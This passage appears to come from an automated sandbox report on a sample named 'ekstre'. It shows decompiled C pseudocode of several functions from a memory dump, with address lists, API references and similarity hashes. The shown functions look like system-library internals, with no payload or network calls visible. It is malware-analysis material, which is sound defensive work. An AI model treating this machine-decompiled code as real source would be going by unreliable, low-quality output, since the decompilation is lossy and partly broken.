0x341cfcb3
0x341cfcb3
0x341726f1
0x341726f3
0x341726f5
0x341726fc
0x341726fe
0x3417270b
0x34172700
0x34172700
0x34172700
0x341726fe
0x00000000
0x341726f3
0x34172707
0x00000000
0x34172707
0x341726cd
0x341726c4
0x341726bf
0x341726af
0x341726b3
0x341725ae
0x341725ae
0x341725b0
0x341725b3
0x341725b6
0x341725b8
0x341725bf
0x341725c4
0x341725c7
0x341725cd
0x34172661
0x34172667
0x34172678
0x3417267c
0x3417267c
0x3417267d
0x341cfc33
0x341cfc33
0x34172669
0x34172669
0x3417266e
0x00000000
0x3417266e
0x341725d3
0x341725d3
0x341725d8
0x341725dd
0x341725dd
0x341725dd
0x341725e2
0x341725e2
0x341725e7
0x34172607
0x3417260f
0x34172615
0x34172618
0x34172621
0x34172630
0x34172636
0x3417263e
0x3417263e
0x341725ec
0x341725f8
0x341725f8
0x341725a0

APIs

RtlDebugPrintTimes.NTDLL ref: 34172630

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4057f129ef1a37da15e54959fdccc5a0d1aff7e0153fc74c0bcf9bc77d2b9c88
Instruction ID: 9f6640a7398c77c104b1d3f8d8812f082a7dcae5102ba2550752738c9ee61e69
Opcode Fuzzy Hash: 4057f129ef1a37da15e54959fdccc5a0d1aff7e0153fc74c0bcf9bc77d2b9c88
Instruction Fuzzy Hash: B0416DB5A01B04CFE715CF24C9D0A89FBB6FF44354F11829ED456AB2A4DB74AA82CF41

Uniqueness

Uniqueness Score: -1.00%

Function 341F0443 Relevance: 1.6, APIs: 1, Instructions: 114
timeCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E341F0443(signed int __ecx, char _a4, signed int _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				signed int _v128;
				char _v132;
				char _v136;
				signed int _v144;
				intOrPtr _v152;
				char _v156;
				unsigned short _v160;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				signed int _t68;
				void* _t69;
				void* _t71;
				signed int _t74;
				char _t76;
				void* _t77;
				signed int _t79;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed int _t85;

				_t70 = __ecx;
				_t85 = (_t83 & 0xfffffff8) - 0x94;
				_v8 =  *0x3426b370 ^ _t85;
				_t74 =  *0x342665fc; // 0x3b4c2899
				_t68 = _a8;
				_v128 = _t68;
				_t79 =  *0x34265d38; // 0x55e0cca7
				_t76 = _a4;
				_v132 = _t76;
				if(_t74 == 0) {
					_push(_t74);
					_push(4);
					_push( &_v136);
					_push(0x24);
					_push(0xffffffff);
					if(L341B2B20() < 0) {
						L2:
						L341C8AA0(_t70, _t74, _t54);
					}
					_t74 = _v144;
					 *0x342665fc = _t74;
				}
				_t71 = 0x20;
				_t70 = _t71 - (_t74 & 0x0000001f);
				asm("ror esi, cl");
				_t80 = _t79 ^ _t74;
				if(_t80 == 0) {
					_push(0x341450b4);
					_push( &_v132);
					_t46 = L34228890(_t68, _t74, _t76, _t80, __eflags);
				} else {
					_t70 = _t80;
					 *0x342691e0( &_v132);
					_t46 =  *_t80();
				}
				if(_t46 != 0xffffffff) {
					_t79 = 0;
					if(E3416E0E0(0x34151298, 0, 0,  &_v156) == 0) {
						_push(2);
						_t74 =  *( *[fs:0x30] + 0x10);
						_v40 = _v40 & 0x00000000;
						_v160 =  *(_t74 + 0x38) >> 1;
						_v48 = 0;
						_v52 =  &_v160;
						_v44 = 0;
						_t70 =  *(_t74 + 0x38) & 0x0000ffff;
						_v32 = _v32 & 0x00000000;
						_v24 = _v24 & 0x00000000;
						_v36 =  *((intOrPtr*)(_t74 + 0x3c));
						_v28 =  *(_t74 + 0x38) & 0x0000ffff;
						E341A1280(_t68, _v156, _v152, 0x34151268, 0,  &_v52);
						_t79 = 0;
						L34199A00( *(_t74 + 0x38) & 0x0000ffff, _v176, _v172, 0);
					}
					_v120 =  *((intOrPtr*)(_t68 + 0xb8));
					_v132 = 0xc000041d;
					_push(_t79);
					_v128 =  *(_t76 + 4) | 0x00000001;
					_push(_t68);
					_push( &_v132);
					_v124 = _t76;
					_v116 = _t79;
					_t54 = E341B4010();
					goto L2;
				}
				_pop(_t77);
				_pop(_t81);
				_pop(_t69);
				__eflags = _v16 ^ _t85;
				return L341B4B50(_t46, _t69, _v16 ^ _t85, _t74, _t77, _t81);
			}

0x341f0443
0x341f044b
0x341f0458
0x341f045f
0x341f0466
0x341f0469
0x341f046e
0x341f0475
0x341f0478
0x341f047e
0x341f0480
0x341f0481
0x341f0487
0x341f0488
0x341f048a
0x341f0493
0x341f0495
0x341f0496
0x341f0496
0x341f049b
0x341f049f
0x341f049f
0x341f04ac
0x341f04ad
0x341f04b3
0x341f04b5
0x341f04b7
0x341f04c6
0x341f04cb
0x341f04cc
0x341f04b9
0x341f04ba
0x341f04bc
0x341f04c2
0x341f04c2
0x341f04d4
0x341f04de
0x341f04ef
0x341f04fb
0x341f04fd
0x341f0504
0x341f050f
0x341f0518
0x341f0520
0x341f0524
0x341f052b
0x341f0532
0x341f053a
0x341f0542
0x341f054b
0x341f0565
0x341f056a
0x341f0575
0x341f0575
0x341f0580
0x341f058a
0x341f0592
0x341f0593
0x341f059b
0x341f059c
0x341f059d
0x341f05a1
0x341f05a5
0x00000000
0x341f05a5
0x341f05b6
0x341f05b7
0x341f05b8
0x341f05b9
0x341f05c3

APIs

RtlDebugPrintTimes.NTDLL ref: 341F04BC

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 82a5accf63931591e611eade07ff0cc6b3a5c4c98f18f20b889d75c0045f4d73
Instruction ID: 8c3d13c2bcb8f9b27410ad3db8289e42a4b1969af146805583df8644e2020e42
Opcode Fuzzy Hash: 82a5accf63931591e611eade07ff0cc6b3a5c4c98f18f20b889d75c0045f4d73
Instruction Fuzzy Hash: 2B416B71504700DFE760CF28C884B9BBBE9FB88254F008A2AF998D7251DB709945CF96

Uniqueness

Uniqueness Score: -1.00%

Function 34174779 Relevance: 1.6, APIs: 1, Instructions: 111
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E34174779(signed int __eax, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v0;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t67;
				signed int _t69;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				signed int _t79;
				void* _t80;
				intOrPtr* _t84;
				signed int _t88;
				intOrPtr* _t93;
				intOrPtr _t96;
				signed int _t98;
				intOrPtr* _t100;
				void* _t102;

				_t88 = __edx;
				_t55 = __eax;
				_push(_t73);
				_t100 = __edx;
				if((_a4 & 0x00000001) == 0) {
					L17:
					if((_a4 & 0x00000002) != 0) {
						_t93 = _t100 + 8;
						_t74 = 8;
						do {
							__eflags =  *_t93;
							if( *_t93 != 0) {
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t93);
							}
							_t93 = _t93 + 4;
							_t74 = _t74 - 1;
							__eflags = _t74;
						} while (_t74 != 0);
						_t55 = L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t100);
					}
					return _t55;
				} else {
					_t79 =  *0x342666fc; // 0x5
					_v12 = _t79;
					if(_t79 >= 1) {
						_t98 = 0x11;
						do {
							asm("bsr eax, edi");
							_t88 = _t98;
							asm("btc edx, eax");
							_v20 = _t88;
							_t55 =  *(_t100 + _t55 * 4 - 8);
							_v16 = _t55;
							if(_t55 != 0) {
								_t55 = _t55 + _t88 * 4 + 4;
								if(_t55 != 0 &&  *_t55 != 0) {
									asm("bsr eax, edi");
									_t85 = _t98;
									asm("btc ecx, eax");
									_t67 =  *((intOrPtr*)(0x342666c4 + _t55 * 4));
									if(_t67 == 0) {
										_t73 = 0;
									} else {
										_t73 = 4 + _t85 * 8 + _t67;
									}
									L341753C0(_t73);
									_t69 =  *((intOrPtr*)(_t73 + 4));
									_v12 = _t69;
									if(_t69 != 0 && _t69 != 0xffffffff) {
										_t88 = _v16;
										_t85 =  *(_t88 + 4 + _v20 * 4);
										if(_t85 != 0) {
											 *0x342691e0(_t85);
											_v8();
											_t72 = _v24;
											 *(_v20 + 4 + _t72 * 4) =  *(_v20 + 4 + _v24 * 4) & 0x00000000;
										}
									}
									_t55 = E341752F0(_t85, _t73);
									_t79 = _v16;
								}
							}
							_t98 = _t98 + 1;
							_t79 = _t79 - 1;
							_v12 = _t79;
						} while (_t79 != 0);
					}
					L34182330(_t55, 0x342666d0);
					_t60 =  *_t100;
					if( *((intOrPtr*)(_t60 + 4)) != _t100) {
						L24:
						_t80 = 3;
						asm("int 0x29");
						_push(_t80);
						_push(_t73);
						_push(_t100);
						_push(0x342666d0);
						_t96 = _v28;
						_t76 = _t88;
						_t102 = _t80;
						__eflags = _t96;
						if(__eflags != 0) {
							_t61 =  *((intOrPtr*)(_t96 + 0x1c));
						} else {
							_t61 = 0;
							__eflags = 0;
						}
						_push(_a12);
						_push(_a8);
						_push(_t61);
						_push(_t96);
						_t62 = L3417496B(_t76, _t80, _t96, _t102, __eflags);
						__eflags = _t62;
						if(_t62 >= 0) {
							L3417491F( *((intOrPtr*)(_t102 + 0x5c)), 1);
							 *(_t102 + 0x90) =  *(_t102 + 0x90) & 0x00000000;
							 *(_t102 + 0xdd) = _t76;
							__eflags = _t96;
							if(_t96 != 0) {
								 *((intOrPtr*)(_t102 + 0x10)) =  *((intOrPtr*)(_t96 + 0x18));
							}
							__eflags =  *((intOrPtr*)(_t102 + 8));
							if(__eflags != 0) {
								E341A73B3(_t76, _t102, _t96, _t102, __eflags);
							}
							_t62 = 0;
							__eflags = 0;
						}
						return _t62;
					} else {
						_t84 =  *((intOrPtr*)(_t100 + 4));
						if( *_t84 != _t100) {
							goto L24;
						} else {
							 *_t84 = _t60;
							 *((intOrPtr*)(_t60 + 4)) = _t84;
							_t55 = E341824D0(0x342666d0);
							goto L17;
						}
					}
				}
			}

0x34174779
0x34174779
0x34174788
0x3417478b
0x3417478d
0x3417486a
0x3417486e
0x3417487b
0x3417487e
0x3417487f
0x3417487f
0x34174882
0x341748ab
0x341748ab
0x34174884
0x34174887
0x34174887
0x34174887
0x34174897
0x34174897
0x34174876
0x34174793
0x34174793
0x34174799
0x341747a0
0x341747a8
0x341747a9
0x341747a9
0x341747ac
0x341747ae
0x341747b1
0x341747b5
0x341747b9
0x341747bf
0x341747c4
0x341747c7
0x341747ce
0x341747d1
0x341747d3
0x341747d6
0x341747df
0x341d0144
0x341747e5
0x341747ec
0x341747ec
0x341747ef
0x341747f4
0x341747f7
0x341747fd
0x34174808
0x3417480c
0x34174812
0x34174817
0x3417481d
0x34174821
0x34174829
0x34174829
0x34174812
0x3417482f
0x34174834
0x34174834
0x341747c7
0x34174838
0x34174839
0x3417483c
0x3417483c
0x341747a9
0x3417484c
0x34174851
0x34174856
0x341748b2
0x341748b4
0x341748b5
0x341748bc
0x341748bd
0x341748be
0x341748bf
0x341748c0
0x341748c3
0x341748c5
0x341748c7
0x341748c9
0x3417491a
0x341748cb
0x341748cb
0x341748cb
0x341748cb
0x341748cd
0x341748d3
0x341748d6
0x341748d7
0x341748d8
0x341748dd
0x341748df
0x341748e7
0x341748ec
0x341748f3
0x341748f9
0x341748fb
0x34174900
0x34174900
0x34174903
0x34174907
0x3417490b
0x3417490b
0x34174910
0x34174910
0x34174910
0x34174917
0x34174858
0x34174858
0x3417485d
0x00000000
0x3417485f
0x3417485f
0x34174862
0x34174865
0x00000000
0x34174865
0x3417485d
0x34174856

APIs

RtlDebugPrintTimes.NTDLL ref: 34174817

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7d7996bac70792b2037fe047e6dc1d05d17aefc6ad2303567541dd4ced374cc1
Instruction ID: cef70f5a045e788cd239ccba18a272cf6a89d8aced6608464a1c4e9fbf4c2802
Opcode Fuzzy Hash: 7d7996bac70792b2037fe047e6dc1d05d17aefc6ad2303567541dd4ced374cc1
Instruction Fuzzy Hash: 3F41E2B4644B85CFE311CF68D8D4B2ABFEAEF81350F10446DE9818B2A1DB78D851DB91

Uniqueness

Uniqueness Score: -1.00%

Function 3416B420 Relevance: 1.6, APIs: 1, Instructions: 100
timeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E3416B420(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr* _t46;
				intOrPtr _t47;
				void* _t49;
				intOrPtr _t51;
				intOrPtr _t61;
				intOrPtr* _t62;
				signed int _t69;
				void* _t71;

				_t40 = __ebx;
				_t71 = (_t69 & 0xfffffff8) - 0x14;
				_push(__ebx);
				_t61 = _a8;
				_push(__edi);
				_t57 = _t61 + 0x14;
				L34182330(_t25, _t61 + 0x14);
				_t27 = _t61 + 0x18;
				_t62 =  *_t27;
				if(_t62 == _t27) {
					_t62 = 0;
					goto L4;
				} else {
					if( *((intOrPtr*)(_t62 + 4)) != _t27) {
						L11:
						_t49 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if( *0x34265da8 == 0) {
							E3416B566(_t49, _v0, _t57, _t62);
							return E3416B502(_v0);
						}
						return _t27;
					} else {
						_t51 =  *_t62;
						if( *((intOrPtr*)(_t51 + 4)) != _t62) {
							goto L11;
						} else {
							 *_t27 = _t51;
							 *((intOrPtr*)(_t51 + 4)) = _t27;
							L4:
							_t28 = E341824D0(_t57);
							_t42 = _a8;
							if((_t40 & 0xffffff00 |  *_t27 != _t27) != 0) {
								_t28 = E34181C8F(_t42, _t42,  *((intOrPtr*)(_a4 + 0x48)), _t57, "true", 0);
							}
							if(_t62 != 0) {
								_t10 = _t62 - 0x10; // -16
								_t29 = _t10;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t46 =  *((intOrPtr*)(_t29 + 0x18));
								asm("lock xadd [ecx+0x4], eax");
								if((_t29 | 0xffffffff) == 0) {
									_t31 =  *0x34266644; // 0x0
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t31 + 0x300000,  *_t46);
								}
								_t47 = _a4;
								 *((intOrPtr*)(_t47 + 0x30)) =  *((intOrPtr*)(_t42 + 0x20));
								 *((intOrPtr*)(_t47 + 0x34)) = _t42;
								 *0x342691e0(_t47, _t42,  *((intOrPtr*)(_t71 + 0x18)), _t71 + 0x18);
								_t28 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x20))))();
							}
							return _t28;
						}
					}
				}
			}

0x3416b420
0x3416b428
0x3416b42b
0x3416b42d
0x3416b430
0x3416b431
0x3416b435
0x3416b43a
0x3416b43d
0x3416b441
0x3416b4d0
0x00000000
0x3416b447
0x3416b44a
0x3416b4d4
0x3416b4d6
0x3416b4d7
0x3416b4d9
0x3416b4da
0x3416b4db
0x3416b4dc
0x3416b4dd
0x3416b4de
0x3416b4df
0x3416b4ec
0x3416b4f1
0x00000000
0x3416b4f9
0x3416b4ff
0x3416b450
0x3416b450
0x3416b455
0x00000000
0x3416b457
0x3416b457
0x3416b459
0x3416b45c
0x3416b462
0x3416b469
0x3416b46c
0x3416b4c9
0x3416b4c9
0x3416b470
0x3416b472
0x3416b472
0x3416b47b
0x3416b47c
0x3416b47d
0x3416b47e
0x3416b47f
0x3416b485
0x3416b48a
0x341cccdd
0x341cccf1
0x341cccf1
0x3416b490
0x3416b496
0x3416b4a2
0x3416b4ac
0x3416b4b2
0x3416b4b2
0x3416b4ba
0x3416b4ba
0x3416b455
0x3416b44a

APIs

RtlDebugPrintTimes.NTDLL ref: 3416B4AC

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a9ccc3ac850320bf26c08ed8246c6a93da53d1dd9242697d9169265e3e8bd4c4
Instruction ID: f67d200be1f1efa7b69ffab48b06f9666d6f995a9bed06bdd2f9f06523c5792b
Opcode Fuzzy Hash: a9ccc3ac850320bf26c08ed8246c6a93da53d1dd9242697d9169265e3e8bd4c4
Instruction Fuzzy Hash: FC312472600A14DFD311CF14C8C0A5777AAEF84368F1182A9EE069B291DB35ED52CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 341756E0 Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E341756E0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v36;
				void* _v60;
				void* _t32;
				char* _t35;
				void* _t37;
				char* _t41;
				char* _t52;
				intOrPtr _t60;
				void* _t70;
				signed int _t76;
				signed int _t77;

				_t77 = _t76 & 0xfffffff8;
				_push(__ecx);
				_t73 = _a8;
				_t70 = _a8 - 0x78;
				_t32 = E34183C40();
				_t52 = 0x7ffe0386;
				if(_t32 != 0) {
					_t35 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t35 = 0x7ffe0386;
				}
				if( *_t35 != 0) {
					L34244B67( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
				}
				_t37 = E34177072(_a4, _t70, 0);
				if(_t37 != 0) {
					if(E34183C40() != 0) {
						_t41 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t41 = _t52;
					}
					if( *_t41 != 0) {
						E34244C59( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					E34176F4C(_t77 + 0x10,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					_t60 = _a4;
					 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t70 + 0x30));
					 *((intOrPtr*)(_t60 + 0x34)) =  *((intOrPtr*)(_t70 + 0x34));
					 *0x342691e0(_t60,  *((intOrPtr*)(_t70 + 0x34)), _t70);
					 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x30))))();
					if(E34183C40() != 0) {
						_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t52 != 0) {
						E34244CD2( *((intOrPtr*)(_t70 + 0x5c)), _a8,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					_t37 = E34176ECF( *((intOrPtr*)(_t77 + 0xc)));
				}
				return _t37;
			}

0x341756e5
0x341756e8
0x341756eb
0x341756ef
0x341756f2
0x341756f7
0x341756fe
0x341d06a1
0x34175704
0x34175704
0x34175704
0x34175709
0x341d06b9
0x341d06b9
0x34175716
0x3417571d
0x34175726
0x341d06cc
0x3417572c
0x3417572c
0x3417572c
0x34175731
0x341d06e4
0x341d06e4
0x34175744
0x34175749
0x34175750
0x34175756
0x34175762
0x34175768
0x34175771
0x341d06f7
0x341d06f7
0x3417577a
0x341d0711
0x341d0711
0x34175784
0x34175784
0x3417578f

APIs

RtlDebugPrintTimes.NTDLL ref: 34175762

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 979e10e2bbf88c5b4e796948a95b6f464014d7cb91269501d6f70e503f1ebf61
Instruction ID: 2d6aa37ecf9728f2fb57fb042fcfacaf25be897b05f24ed7b3a67e0c764bb550
Opcode Fuzzy Hash: 979e10e2bbf88c5b4e796948a95b6f464014d7cb91269501d6f70e503f1ebf61
Instruction Fuzzy Hash: E2316979715E05EFE7458B24CAC0A99BBA6FF85654F845095E8009BE50DB31E831CF84

Uniqueness

Uniqueness Score: -1.00%

Function 3421E750 Relevance: 1.6, APIs: 1, Instructions: 91
timeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E3421E750(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				char _v25;
				intOrPtr _v28;
				intOrPtr* _v32;
				char _v33;
				char* _t30;
				intOrPtr* _t33;
				void* _t37;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				char* _t49;
				char _t51;
				char* _t53;
				intOrPtr* _t57;
				intOrPtr* _t60;

				_t30 =  &_v12;
				_v24 = __ecx;
				_t60 = __edx;
				_v8 = _t30;
				_t46 = 0;
				_v16 = __edx;
				_v25 = 0;
				_v12 = _t30;
				L34182330(_t30, 0x34266d4c);
				_t57 =  *0x3426379c; // 0x77aa379c
				if(_t57 == 0x3426379c) {
					L10:
					E341824D0(0x34266d4c);
					while(1) {
						_t33 = _v12;
						_t49 =  &_v12;
						if(_t33 == _t49) {
							goto L16;
						}
						if( *((intOrPtr*)(_t33 + 4)) != _t49) {
							goto L15;
						} else {
							_t51 =  *_t33;
							if( *((intOrPtr*)(_t51 + 4)) != _t33) {
								goto L15;
							} else {
								_v12 = _t51;
								 *((intOrPtr*)(_t51 + 4)) =  &_v12;
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
								continue;
							}
						}
						goto L16;
					}
				} else {
					do {
						_t7 = _t57 + 8; // 0x77aa37a4
						_t37 = _t7;
						_t46 = _t57;
						 *_t37 =  *_t37 + 1;
						_v20 = _t37;
						E341824D0(0x34266d4c);
						 *0x342691e0(_v28, _t60);
						if( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0xc))))() != 0) {
							_v33 = 1;
						}
						L34182330(_t40, 0x34266d4c);
						_t42 = _v32;
						_t57 =  *_t57;
						 *_t42 =  *_t42 - 1;
						if( *_t42 != 0) {
							goto L8;
						} else {
							if( *((intOrPtr*)(_t57 + 4)) != _t46) {
								L15:
								_push(3);
								asm("int 0x29");
							} else {
								_t43 =  *((intOrPtr*)(_t46 + 4));
								if( *_t43 != _t46) {
									goto L15;
								} else {
									 *_t43 = _t57;
									_t53 =  &_v20;
									 *((intOrPtr*)(_t57 + 4)) = _t43;
									_t44 = _v16;
									if( *_t44 != _t53) {
										goto L15;
									} else {
										 *_t46 = _t53;
										 *((intOrPtr*)(_t46 + 4)) = _t44;
										 *_t44 = _t46;
										_v16 = _t46;
										goto L8;
									}
								}
							}
						}
						goto L16;
						L8:
						_t60 = _v24;
					} while (_t57 != 0x3426379c);
					_t46 = _v33;
					goto L10;
				}
				L16:
				return _t46;
			}

0x3421e75e
0x3421e762
0x3421e766
0x3421e768
0x3421e76c
0x3421e76e
0x3421e777
0x3421e77b
0x3421e77f
0x3421e784
0x3421e790
0x3421e80f
0x3421e814
0x3421e819
0x3421e819
0x3421e81d
0x3421e823
0x00000000
0x00000000
0x3421e828
0x00000000
0x3421e82a
0x3421e82a
0x3421e82f
0x00000000
0x3421e831
0x3421e83c
0x3421e842
0x3421e848
0x00000000
0x3421e848
0x3421e82f
0x00000000
0x3421e828
0x3421e792
0x3421e792
0x3421e792
0x3421e792
0x3421e795
0x3421e797
0x3421e79e
0x3421e7a2
0x3421e7b1
0x3421e7bb
0x3421e7bd
0x3421e7bd
0x3421e7c7
0x3421e7cc
0x3421e7d0
0x3421e7d2
0x3421e7d5
0x00000000
0x3421e7d7
0x3421e7da
0x3421e84f
0x3421e84f
0x3421e852
0x3421e7dc
0x3421e7dc
0x3421e7e1
0x00000000
0x3421e7e3
0x3421e7e3
0x3421e7e5
0x3421e7e9
0x3421e7ec
0x3421e7f2
0x00000000
0x3421e7f4
0x3421e7f4
0x3421e7f6
0x3421e7f9
0x3421e7fb
0x00000000
0x3421e7fb
0x3421e7f2
0x3421e7e1
0x3421e7da
0x00000000
0x3421e7ff
0x3421e7ff
0x3421e803
0x3421e80b
0x00000000
0x3421e80b
0x3421e854
0x3421e85c

APIs

RtlDebugPrintTimes.NTDLL ref: 3421E7B1

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 18de5d58878c4fcbc105bb401fc4f619041be42b5d81f8a741fe67539dc033bb
Instruction ID: 589fa44b457c394ec9a9327eb6b66e1000f409406aac12814de2af9f5435aba3
Opcode Fuzzy Hash: 18de5d58878c4fcbc105bb401fc4f619041be42b5d81f8a741fe67539dc033bb
Instruction Fuzzy Hash: 5B31AEB5904302CFD701CF19C84494ABBE6FF89758F0585AEE488AB261D730DD85CF92

Uniqueness

Uniqueness Score: -1.00%

Function 34173536 Relevance: 1.6, APIs: 1, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E34173536(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int* _v8;
				char _v9;
				char _v17;
				signed int* _v20;
				void* _t24;
				signed int _t26;
				signed int* _t28;
				signed int* _t38;
				signed int _t39;
				intOrPtr* _t47;
				signed int _t49;
				signed int _t54;
				void* _t62;

				_t38 = __ecx;
				_t47 = __edx;
				_v8 = __ecx;
				if(_a4 != 0 || _a8 != 0) {
					_v9 = 0;
					_t54 = 0;
					L9:
					 *0x342691e0(_a4, _a8);
					_t26 =  *_t47();
					_t39 = _t26;
					if(_t39 != 0) {
						 *((intOrPtr*)(_t39 + 0x34)) = 1;
						if(_v17 != 0) {
							_t49 = 0;
							L34182330(_t26, 0x342667c4);
							_t28 = _v20;
							if( *_t28 == _t54) {
								 *_t28 = _t39;
								 *((intOrPtr*)(_t39 + 0x34)) =  *((intOrPtr*)(_t39 + 0x34)) + 1;
								if(_t54 != 0) {
									 *(_t54 + 0x34) =  *(_t54 + 0x34) - 1;
									asm("sbb edi, edi");
									_t49 =  !( ~( *(_t54 + 0x34))) & _t54;
								}
							}
							E341824D0(0x342667c4);
							if(_t49 != 0) {
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t49);
							}
						}
						_t26 = _t39;
					}
					goto L17;
				} else {
					_v9 = 1;
					L34182330(_t24, 0x342667c4);
					_t54 =  *_t38;
					if(_t54 == 0) {
						L7:
						E341824D0(0x342667c4);
						goto L9;
					}
					_t62 =  *((intOrPtr*)(_t54 + 0x3c)) -  *0x3426690c; // 0x0
					if(_t62 != 0 ||  *((char*)(_t54 + 0x48)) == 0 &&  *((intOrPtr*)(_t54 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L7;
					} else {
